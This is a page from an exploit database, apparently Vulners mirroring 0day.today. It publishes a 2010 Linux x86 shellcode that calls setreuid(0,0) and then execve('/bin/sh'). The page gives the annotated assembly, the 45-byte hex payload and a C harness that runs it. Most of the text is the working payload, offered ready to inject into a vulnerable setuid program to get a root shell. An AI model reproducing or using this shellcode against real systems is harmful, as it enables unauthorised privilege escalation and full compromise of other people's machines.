Vulners
Lucene search
linux/x86 execute /bin/sh with setreuid 0,0 45 Bytes
====================================================
linux/x86 execute /bin/sh with setreuid 0,0 45 Bytes
====================================================
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Title : execute /bin/sh with setreuid 0,0
Name : 45 bytes sys_setreuid (0,0) - sys_execve("/bin/sh","","")
Date : Thu Jun 17 16:58:40 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz : jasakom.com , devilzc0de.org - com , xc0de.or.id, yogyacarderlink.web.id, serverisdown.org
tested on : linux debian
---------------------------Original assembly-----------------------------
global _start
_start:
xor eax, eax ; bersihkan register!
xor edx, edx ;
xor ebx, ebx ;
xor ecx, ecx ;
mov al, 70 ; sys_setreuid()
add bl,1 ; tambah 1 register bl menjadi 1 -> sys_setreuid(1,)
dec bl ; kurangi 1 register bl menjadi 0 -> sys_setreuid(0,)
mov cl,bl ; kopikan nilai register bl ke cl. nilai register cl menjadi 0 -> sys_setreuid(0,0)
int 0x80 ; interupsi kernel kerjakan !
jmp short end ; loncat tanpa kondisi ke end >-------------------------------------------------------------------.
; |
start: ; start terpanggil <--------------------------------------------------------------------------. |
mov al,11 ; syscall nomer 11 execve | | ;syscall sys_execve(args1,args2,args3)
pop ebx ; ambil dari stack <-------------------------------------------------------------------------------------------------------. ;sys_execve ("/bin/sh"
mov ecx, edx ; nilai register edx kosong, lalu kopikan ke register ecx jadi ecx kosong | | | ;sys_execve ("/bin/sh",0,0)
int 0x80 ; interupsi kernel, kerjakan ! | | | ;
; | | |
xor eax, eax ; bersihkan register ecx | | | ;syscall exit()
inc eax ; increment eax, atau tambah eax 1 karena nilai eax 0 jadi eax menjadi 1 syscall nomer 1 exit | | | ;sys_exit()
int 0x80 ; interupsi kernel, kerjakan ! | | | ;
; | | |
end: ; label start <-----------------------------------------------------------------------------------' |
call start ; panggil start >-----------------------------------------------------------------------------' |
db '/bin/sh' ; masukan string '/bin/sh' ke stack >--------------------------------------------------------------------------------------'
------------------------Eof Original assembly-----------------------------
*/
#include <stdio.h>
char *shellcode=
"\x31\xc0" /* xor %eax,%eax */
"\x31\xd2" /* xor %edx,%edx */
"\x31\xdb" /* xor %ebx,%ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb0\x46" /* mov $0x46,%al */
"\x80\xc3\x01" /* add $0x1,%bl */
"\xfe\xcb" /* dec %bl */
"\x88\xd9" /* mov %bl,%cl */
"\xcd\x80" /* int $0x80 */
"\xeb\x0c" /* jmp 0x8048081 */
"\xb0\x0b" /* mov $0xb,%al */
"\x5b" /* pop %ebx */
"\x89\xd1" /* mov %edx,%ecx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xef\xff\xff\xff" /* call 0x8048075 */
"\x2f" /* das */
"\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */
"\x2f" /* das */
"\x73\x68"; /* jae 0x80480f5 */
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
# 0day.today [2018-02-17] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2010 00:00Current
7High risk
Vulners AI Score7